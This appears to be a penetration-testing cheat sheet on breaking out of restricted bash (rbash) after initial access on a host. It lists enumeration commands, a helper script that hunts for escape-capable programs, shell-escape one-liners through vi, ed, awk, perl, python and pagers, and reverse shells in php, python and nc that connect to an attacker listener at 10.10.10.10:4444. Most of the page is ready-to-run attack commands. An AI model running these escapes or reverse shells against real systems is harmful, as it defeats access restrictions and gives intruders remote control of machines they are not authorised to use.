Overview
When performing host enumeration after gaining initial access, echo $SHELL may return /bin/rbash. This is bash started in restricted mode (invoked as rbash, or as bash -r), which confines a standard user to running whatever commands sit on a fixed PATH; shopt restricted_shell reports on when that mode is active.
Common restrictions are:
- no write access to environment variables such as $SHELL, $PATH, $ENV or $BASH_ENV
- no use of special characters such as / in a command name (so /bin/bash is refused even if bash itself would run) and no output redirection with > or >&
- builtins such as cd and exec are refused, and tools such as ftp or scp are simply not on the restricted PATH; this is easily identifiable when you try a command and get
rbash: cd: restricted
or
command not found
Escaping
Escaping rbash to gain a standard shell depends on what tools are actually available. There are cases where the shell is sufficiently locked down and an RCE vulnerability will need to be identified to properly pop a standard shell.
Try swapping between /bin/bash, bash, /bin/sh, sh and so on when attempting these: rbash refuses any command name containing a slash, but a bare bash or sh works if the binary is on the restricted PATH, and an interpreter such as perl or python runs the absolute path through its own /bin/sh -c, where the slash rule no longer applies. Note that everything typed is still saved to history and can trigger an alarm on higher security systems.
# if ssh creds are available, you can try to bypass on login (a bare "bash" without the slash is worth trying as well)
ssh [email protected] -t "/bin/bash --noprofile"
# reveal what commands we have access to: compgen -c lists builtins, aliases, functions and every executable on the restricted PATH (compgen -b shows builtins only)
compgen -c
# the restricted PATH is usually a single small directory, so check where it points and what is in it
echo $PATH
ls ~/bin
# view environment variables
export -p
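As an added example (not part of the original notes), the following script combines the enumeration steps above: it confirms restricted mode from the shell's own option flags, prints the restricted PATH, and scans the compgen -c output for the escape-capable programs covered on this page. It deliberately relies on builtins only, because the restricted PATH may hold almost nothing and rbash refuses output redirection. The script name triage.sh, the candidate list and the sample inputs are my own assumptions.

```shell
#!/bin/bash
# Added triage helper, not from the original notes. Paste the functions into the
# suspect shell (defining functions is allowed in rbash) or run the file with the
# shell under test:  bash -r ./triage.sh   (triage.sh is an assumed file name)
# Assumption: only shell builtins are used, since the restricted PATH may contain
# almost nothing and rbash refuses the > redirection operator.

# Programs this page gives an escape for, in page order (assumed list).
ESCAPE_CANDIDATES="vi ed awk expect less more man perl python python3 php nc sh bash"

# Return 0 when the running shell is bash in restricted mode: bash reports that
# as an 'r' flag in $-, alongside the usual i/m/B/H flags.
is_restricted() {
  case "$-" in
    *r*) return 0 ;;
    *)   return 1 ;;
  esac
}

# Given a newline-separated command list (the shape compgen -c prints), echo the
# escape-capable programs that are present, space-separated, in candidate order.
# Exact line matches only, so "python" does not match "python3".
find_escapes() {
  local available="$1" found="" c line
  for c in $ESCAPE_CANDIDATES; do
    while IFS= read -r line; do
      if [ "$line" = "$c" ]; then
        found="$found $c"
        break
      fi
    done <<EOF
$available
EOF
  done
  printf '%s\n' "${found# }"
}

# Live report when run inside the session being examined.
if is_restricted; then
  echo "restricted mode is on (flags: $-)"
else
  echo "restricted mode flag not set (flags: $-)"
fi
echo "PATH=$PATH"
if [ -n "$BASH_VERSION" ]; then
  # compgen is a bash builtin, so only ask for it under bash
  echo "escape candidates on this PATH: $(find_escapes "$(compgen -c)")"
fi
```

Because the functions are defined in the session rather than written to disk, they work even when the restricted PATH and the redirection rules leave you no way to create a file.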
# these next commands can only be run if the program shows up in compgen -c or ~/bin,
# otherwise you will get a restricted or command not found error
# if vi available:
vi
:set shell=/bin/bash
:shell
# if ed available (! runs the rest of the line through /bin/sh):
ed
!/bin/bash
# if awk available:
awk 'BEGIN {system("/bin/bash")}'
# if expect is available (spawn starts the process, interact attaches your terminal to it)
expect
spawn sh
interact
# if less, more or man is available (try with any of those 3; man pages are shown through the same pager)
less file.txt
!/bin/bash
# note: less runs the ! command through $SHELL, so if that is still rbash the slash is refused; try !bash instead
# if perl available:
perl -e 'system("/bin/bash");'
# if python available
python3 -c 'import os; os.system("/bin/bash");'
# if sh available
sh
# these are reverse shells, ensure a listener is started on attacker machine
# if php available:
php -r '$sock=fsockopen("10.10.10.10",4444);shell_exec("/bin/bash <&3 >&3 2>&3");'
# if python/python3 available (same listener port as above):
python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("10.10.10.10",4444));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("/bin/bash")'
# if nc available (-e exists only on some builds, e.g. traditional/ncat, not the OpenBSD one)
nc 10.10.10.10 4444 -e /bin/bash